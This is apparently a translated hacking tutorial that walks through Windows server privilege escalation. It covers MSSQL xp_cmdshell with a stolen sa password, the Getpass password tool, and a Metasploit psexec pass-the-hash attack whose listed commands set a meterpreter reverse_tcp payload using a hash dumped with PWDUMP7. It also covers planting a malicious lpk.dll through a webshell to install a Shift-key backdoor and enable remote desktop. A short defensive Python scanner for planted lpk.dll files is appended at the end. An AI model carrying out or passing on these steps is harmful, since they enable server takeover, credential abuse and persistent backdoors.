Privilege escalation collection (2): Windows server privilege escalation via MSSQL, Getpass, pass-the-hash, and LPK

Source: Internet
Author: User

(i) MSSQL privilege escalation

Prerequisite: obtain the password of the SA account, the highest-privileged user of the MSSQL database.

MSSQL default port: 1433

MSSQL highest-privileged user: sa

Once the sa password is obtained, connect directly with a client tool.

MSSQL ships with the xp_cmdshell stored procedure, which is used to execute cmd commands.

(ii) Getpass privilege escalation

Getpass is a tool that retrieves the passwords of the computer's user accounts.

(iii) Pass-the-hash intrusion with MSF (Metasploit Framework)

Hash: the form in which Windows stores (hashes) user passwords.

MSF download: http://www.rapid7.com/products/metasploit/download.jsp

Demonstrated below on Kali.

MSF usage:

msfconsole                                   // start the console

use exploit/windows/smb/psexec               // select the module

show options                                 // view the module's options

set PAYLOAD windows/meterpreter/reverse_tcp  // set the payload

show targets                                 // view the module's target list

set LHOST                                    // set the local (listener) address
set RHOST 192.168.0.254                      // set the target host address
set SMBUser Administrators                   // set the user name

set SMBPass XXX                              // set the password hash

How is the hash of the target host obtained? It can be dumped with the PWDUMP7 tool.

Just copy the hash line from its output.

exploit                                      // launch the attack

A shell on the target is obtained and commands can be executed.



(iv) LPK privilege escalation

Trigger: an EXE file in the directory is executed. The characteristic is that before any executable is loaded, Windows checks whether the executable's own directory contains this file (lpk.dll); if it does, that copy is loaded, otherwise the DLL under the System32 directory is used.

Startup scenario: 3389 Remote Desktop Connection starts (press Shift repeatedly, then press the hotkey).

Escalation scheme: generate lpk.dll, upload it to a file directory via a webshell, and wait for the administrator to trigger an EXE program.

Run the LPK sethc tool and select "2-key start"; the 2-key and 3-key values are fixed numbers built into LPK sethc, for example 65 and 66 correspond to A and B.

Then click Build, upload the generated lpk.dll to any directory and run any EXE file in it; lpk.dll automatically installs the Shift backdoor.

I generated it in the software's directory, then clicked to run the software.

Then connect remotely, press the Shift key five times, and the following prompt appears.

Then press the combination keys at the same time (that is, the keys set as 65 and 66, corresponding to A and B), and the following password box appears.

Enter the password and you reach the following interface!

It can also be used to execute software, for example to enable 3389; this is selected when generating lpk.dll.

Generate lpk.dll and put it in any directory; remote desktop is off before the software is executed.

Then execute the EXE software and you find that remote desktop has been opened.
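As a defensive counterpart to the search-order hijack described above, here is an added example (not from the original post) that scans a directory tree for lpk.dll copies planted next to executables and flags any whose SHA-256 differs from a trusted System32 copy; the directory layout, file names and placeholder bytes are constructed for the demo.

```python
import hashlib
import os
import tempfile
from pathlib import Path

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def find_planted_lpk(root, trusted_hashes, dll_name="lpk.dll"):
    """Walk root and report every lpk.dll that sits beside an .exe (so the search
    order loads it before the System32 copy) and whose SHA-256 is not trusted."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        lower = {f.lower(): f for f in files}
        if dll_name not in lower:
            continue
        exes = sorted(f for f in files if f.lower().endswith(".exe"))
        if not exes:
            continue  # no executable here would pick it up
        dll = Path(dirpath) / lower[dll_name]
        digest = sha256_of(dll)
        if digest in trusted_hashes:
            continue  # byte-identical to the legitimate copy
        findings.append({"dll": str(dll), "sha256": digest, "loaded_by": exes})
    return findings

def build_demo_tree():
    """Constructed sample tree with placeholder bytes (not real DLLs or EXEs)."""
    root = Path(tempfile.mkdtemp(prefix="lpkscan_"))
    genuine = b"MZ genuine lpk placeholder"
    (root / "System32").mkdir()
    (root / "System32" / "lpk.dll").write_bytes(genuine)
    app = root / "Program Files" / "Tool"
    app.mkdir(parents=True)
    (app / "tool.exe").write_bytes(b"MZ tool placeholder")
    (app / "LPK.dll").write_bytes(b"MZ rogue placeholder")  # planted copy
    backup = root / "backup"
    backup.mkdir()
    (backup / "backup.exe").write_bytes(b"MZ backup placeholder")
    (backup / "lpk.dll").write_bytes(genuine)  # same bytes as System32: benign
    return root, {sha256_of(root / "System32" / "lpk.dll")}

if __name__ == "__main__":
    root, trusted = build_demo_tree()
    for hit in find_planted_lpk(root, trusted):
        print(f"planted {hit['dll']} sha256={hit['sha256'][:12]} next to {hit['loaded_by']}")
```

On a real host, seed trusted_hashes from the genuine copies under System32 and SysWOW64 and point the scan at web roots and upload directories, where a webshell would drop the file.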
